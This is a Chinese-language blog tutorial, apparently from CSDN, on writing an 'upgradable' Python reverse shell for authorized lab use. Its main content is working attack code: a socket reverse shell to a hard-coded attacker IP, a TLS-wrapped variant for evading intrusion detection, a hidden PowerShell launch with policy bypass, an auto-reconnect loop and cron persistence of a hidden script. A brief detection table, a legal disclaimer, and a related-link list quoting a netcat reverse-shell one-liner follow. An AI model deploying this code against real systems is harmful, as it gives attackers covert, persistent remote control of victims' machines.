在合法靶场中用 Python 打造可升级的反弹 Shell

最新推荐文章于 2025-05-20 18:44:14 发布
最新推荐文章于 2025-05-20 18:44:14 发布
阅读量791 收藏 5
点赞数 25
分类专栏: linux 渗透测试 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43114209/article/details/148084259
版权

1 反弹 Shell 概念与工作原理

  • 正向 Shell:攻方主动连接受害主机并获得交互式命令行。大多受防火墙阻拦。

  • 反向/反弹 Shell:受害主机(被控端)主动 拨出 ,连接到攻方监听的端口,绕过内网出口防火墙。

  • 通信流程

    1. 攻方监听 LHOST:LPORT
    2. 受害主机执行脚本,向该地址建 TCP/TLS 连接。
    3. 将标准输入/输出/错误重定向到 Socket,实现交互。

2 环境准备

角色系统工具
攻方Kali Linux / Parrot OSnc / rlwrap nc(可选)
受害任意装有 Python 3 的 Linux/Windows/macOSPython 代码

Tip:若目标仅内置 Python 2,可用 socket+os+pty 写兼容代码,思路完全一致。

3 最小可用 Python 反弹 Shell

#!/usr/bin/env python3
import socket, subprocess, os, sys

def reverse_shell(lhost, lport):
    s = socket.socket()
    try:
        s.connect((lhost, lport))
    except Exception as e:
        sys.exit(0)          # 连接失败静默退出

    for fd in (0, 1, 2):     # 重定向 stdin/stdout/stderr
        os.dup2(s.fileno(), fd)

    subprocess.call(["/bin/bash", "-i"])

if __name__ == "__main__":
    reverse_shell("10.10.14.23", 4444)

攻方端:

nc -lvnp 4444

4 代码剖析

  1. socket.socket() —— 默认 AF_INET + SOCK_STREAM 创建 TCP 套接字。
  2. connect() —— 主动向监听端发起三次握手。
  3. os.dup2() —— 将进程文件描述符 0/1/2 指向套接字,实现数据流重定向。
  4. subprocess.call(["/bin/bash","-i"]) —— 启动交互式 bash;若在 busybox 系统可替换为 /bin/sh

5 升级玩法

5.1 TLS 加密通道

避免明文流量被 IDS/IPS 抓包:

import socket, ssl, subprocess, os

def reverse_shell_tls(lhost, lport):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE          # 靶场演练可关闭校验
    raw_sock = socket.create_connection((lhost, lport))
    s = ctx.wrap_socket(raw_sock, server_hostname=lhost)

    for fd in (0,1,2):
        os.dup2(s.fileno(), fd)
    subprocess.call(["/bin/bash","-i"])

攻方端可用 OpenSSL:

openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 1
openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

5.2 跨平台兼容

Windows 缺少 /bin/bash,可改用 PowerShell:

import subprocess
subprocess.call(["powershell.exe","-NoP","-NonI","-W","Hidden","-Exec","Bypass"])

macOS 使用 /bin/zsh/bin/sh 即可。

5.3 自动重连与持久化

简易重连逻辑(带随机休眠):

import time, random
while True:
    try:
        reverse_shell("10.10.14.23", 4444)
    except:
        time.sleep(random.randint(5,15))

持久化示例(Linux cron):

(crontab -l 2>/dev/null; echo "@reboot python3 /tmp/.rs.py &") | crontab -

6 蓝队视角:检测与防御要点

层面措施
网络IDPS 规则:阻断向非常规端口的出站流量;检测 HTTP(s) 流量中的可疑 TLS 指纹与 SNI。
主机基线加固:关闭无用解释器,SELinux/AppArmor 限制 dup2;开启命令审计。
日志集中式日志与异常行为(子进程/反弹连接)告警。
IOC可疑计划任务、开机项、未知二进制的持久化痕迹。

7 结语

本文展示了如何在授权环境下用 Python 快速实现并扩展反弹 Shell。再次提醒:渗透测试务必遵循 PTES、ISO / IEC 27001 等合规流程,提前获取 书面 授权。
如果你想进一步集成 文件下载上传、端口转发、SOCKS 代理 或写成 C2 框架模块,欢迎在评论区交流。

Happy Hacking — with permission.

强烈提醒: 本文所有内容仅供 红队演练、CTF、正规渗透测试或信息安全教学 之用。 严禁 将文中技术用于任何未获授权的系统,否则可能触犯《刑法》第 285 条 “非法侵入计算机信息系统罪” 及相关法规。

靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权
YouthBelief的博客
02-16 2858
靶机练习 No.24 Vulnhub靶机hackableII0x00 环境安装0x01 信息收集步骤一:ip探测步骤二:端口服务识别0x02 漏洞挖掘思路一:ftp 匿名访问思路二:80 http服务挖掘思路三:ssh爆破步骤一:ftp匿名访问(成功)(1) 匿名登录(2)查看内容步骤二:80http探测(1)访问首页(2)查看源码 有没有隐藏信息(3)目录扫描(4)查看files页面步骤三:ftp上传马(1)查看ftp是否拥有写权限(2)上传 kali自带的php反弹shell的马(3)kali开启监听,
cmd echo写入shell_学习笔记-命令执行及花式bypass写shell
weixin_30801745的博客
01-26 1962
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过写shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1962
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
prime靶场详细解题过程
weixin_71718026的博客
05-22 1143
将 find 的输出传递给 less 可以让你在终端中更方便地查看找到的文件的路径。如下代码为openssl常用解密命令, "-d"参数表示解密,"-a"参数表示使用base64编码,"-K"参数表示使用的密钥(需为16进制), enc是OpenSSL的编码和加密的缩写,它是OpenSSL提供的一个命令行工具,用于加密和解密文件和信息。执行enc文件, 随后要求输入当前用户的密码, 尝试输入password.txt里面的密码, 提示文件执行失败, 说明这个密码是错误的,我们还需要在此系统下深挖正确的密码。
VulnHub靶场-Lampiao
weixin_48972359的博客
04-29 842
靶机:Lampiao靶机中只有一个存放在root家目录中的flag。
完整的渗透测试靶场通关
NZXHJ的博客
07-15 2947
记录一次比较系统的内网渗透靶场通关的文章
【Vulnhub系列】Vulnhub_Raven2靶场渗透(原创)
Lusen的博客
07-28 2176
Vulnhub系列-Raven2靶场做题记录
Vuluhub靶场-breach1
ad12456的博客
05-03 1717
网络设置和准备: 该靶场的ip:192.168.110.140 ,我们要设置为仅主机模式。在虚拟机中将仅主机模式的ip地址范围包含靶机的ip。除了网络设置,还要准备两台kali。一台连接外网,一台和靶机一样要仅主机模式。 信息收集 Nmap扫描 启动靶机,启动kali攻击机。现在了解的信息就一个:IP。首先用nmap扫描端口,看看开启了什么服务。 namp -T4 -A -v 192.168.110.140 发现端口大量的开放,推测应该是安装了蜜罐之类的防护。那我们用最常用的服务端口:80 试一试看
Vulnhub--y0usef靶场漏洞多种方法详解复现
2301_80386983的博客
10-13 1124
rm /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 端口号 >/tmp/f。目录下,找到一个txt文件和一个目录,目录中没什么能利用的,双击点开txt文件中有一串编码字符,经验知是base64的编码(然后在kali中开启监听,nc -lvp 端口号,开启后,再访问一下页面,返回kali发现没有反弹成功。发现是普通用户,尝试提权,发现权限不够,尝试用python命令调用本地shell,,发现是普通用户,尝试提权,方法就跟刚才的本地提权一样的方法,这里我就不演示了。
使用python编写简单的文件上传exp
CC210231的博客
04-02 2204
最近开始学习使用python进行exp的编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1398
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
如何利用 Python 获取京东商品 SKU 信息接口详细说明
J15779585792的博客
05-17 1127
通过上述步骤和代码示例,你可以轻松地使用 Python 调用京东商品 SKU 信息接口,获取商品的详细信息。希望这个指南对你有所帮助!如果你对电商数据开发有更多兴趣,可以尝试探索更复杂的功能,如多线程爬取、数据可视化等。如遇任何疑问或有进一步的需求,请随时与我私信或者评论联系。
python】返回所有匹配项的第一个元素、第二个元素。。。
突围
05-19 317
python】返回所有匹配项的第一个元素、第二个元素。。
进阶知识:无参的函数装饰器之深入理解@wraps()
最新发布
Tom的专栏
05-20 594
@wraps(func)是functools模块中的装饰器工具,主要用于保留被装饰函数的元信息,如函数名称(__name__)和文档字符串(__doc__)。通过使用@wraps(func),装饰器返回的新函数会继承原函数的属性,保持代码的透明性。对比不使用@wraps的情况,后者会导致函数元信息丢失,调试和文档生成时难以追踪原始函数。@wraps(func)在框架开发、单元测试、API文档生成和调试定位等场景中尤为重要,建议始终使用以确保装饰器的透明性和文档一致性。
Python星球日记》 第95天:分布式训练与推理
Code_流苏:在代码中寻诗意,在实践中觅真知
05-19 868
Python星球日记》 第95天:分布式训练与推理,今天,我们将探索分布式训练与推理技术,这是解决大规模AI模型训练和部署挑战的关键方法
04 接口自动化-框架封装思想建立之httprunner框架(上)
iOS_HC的博客
05-20 608
1.httprunner是一个面向http协议的通用测试框架,目前最新的版本3.X。以前比较流行的2.X的版本。2.它的思想是只需要维护yaml/json/py文件就可以实现接口自动化测试,性能测试,线上监控,持续集成。3.架构图。
weibo_comment_pc_tool | 我于2025.5月用python开发的评论采集软件,根据帖子链接爬取评论的界面工具
python布道者0516的博客
05-18 987
开始采集前,先把自己的cookie值填入cookie.txt文件。pc端cookie获取说明:然后把复制的cookie值填写到当前文件夹的cookie.txt文件中。软件首发众公号”老男孩的平凡之路“,欢迎技术交流、深度探讨!
YOLOv7训练时4个类别只出2个类别
qq_48873240的博客
05-16 1097
在使用YOLOv7进行训练和预测时,发现模型仅能预测出两个类别(LFM和SFM),而实际应有四个类别。经过检查,特征图大小和anchors设置均与YOLOv3一致,且YOLOv3表现正常。最终发现问题可能出在detect.py中的conf-thres参数设置过高,将其从0.5调整为0.1后,问题得到解决。此外,还需注意在NMS操作时不使用classes参数,并在train.py中根据实际类别数和图片大小调整hyp['cls']和hyp['obj']的缩放比例。这些调整有助于确保模型能够正确预测所有类别。
UserWarning: Do not pass an input_shape/input_dim argument to a layer 问题及其解决
Humbunklung的专栏
05-17 451
xxx\Lib\site-packages\keras\src\layers\core\dense.py:87: UserWarning: Do not pass an input_shape/input_dim argument to a layer. When using Sequential models, prefer using an Input(shape) object as the first layer in the model instead. super().init(activity
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello.Reader

请我喝杯咖啡吧😊

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值